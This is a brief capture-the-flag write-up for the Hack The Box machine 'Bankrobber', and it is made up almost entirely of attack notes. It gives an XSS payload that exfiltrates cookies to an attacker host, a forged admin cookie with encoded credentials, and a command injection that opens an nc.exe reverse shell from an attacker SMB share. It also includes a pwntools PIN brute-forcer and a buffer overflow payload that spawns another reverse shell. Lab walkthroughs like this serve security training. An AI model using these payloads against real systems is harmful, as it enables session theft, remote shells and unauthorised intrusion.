HTB Bankrobber Write-up

less than 1 minute read

Bankrobber is a 50-point machine on hackthebox that involves exploiting a cross site scripting vulnerability to gain access to an admin account, using a command injection to get a user shell and exploiting a simple buffer overflow to become system. My walkthrough is available on youtube:

Notes


XSS-Payloads:

<script src="http://<ip>:8000/script.js"></script>
function addImg(){
    var img = document.createElement('img');
    img.src = 'http://<ip>:8000/' + document.cookie;
    document.body.appendChild(img);
}
addImg();
var xhr = new XMLHttpRequest();
document.cookie = "id=1; username=YWRtaW4%3D; password=SG9wZWxlc3Nyb21hbnRpYw%3D%3D";
var uri ="/admin/backdoorchecker.php";
xhr = new XMLHttpRequest();
xhr.open("POST", uri, true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.send("cmd=dir|\\\\<ip>\\xshare\\share\\nc.exe <ip> 7000 -e cmd.exe");

SSF:

https://securesocketfunneling.github.io/ssf/#home

Python-Scripts:

from pwn import *

context.proxy = (socks.SOCKS4, 'localhost', 9090)
p = remote('localhost', 910, level='info')	
p.interactive()
from pwn import *

context.proxy = (socks.SOCKS4, 'localhost', 9090)

for i in range(1000):
	p = remote('localhost', 910, level='info')
	p.recvuntil('[$] ')
	pin = str(i).zfill(4)
	p.sendline(pin)
	result = p.recvline()
	if not "denied" in result:
		log.success("Found Pin:" + str(pin))
		break
p.interactive()

Overflow-Payload:

AAAAAAAABBBBBBBCCCCCCCCDDDDDDD\\\\10.10.14.2\xshare\share\nc.exe <ip> 7000 -e cmd.exe

Updated: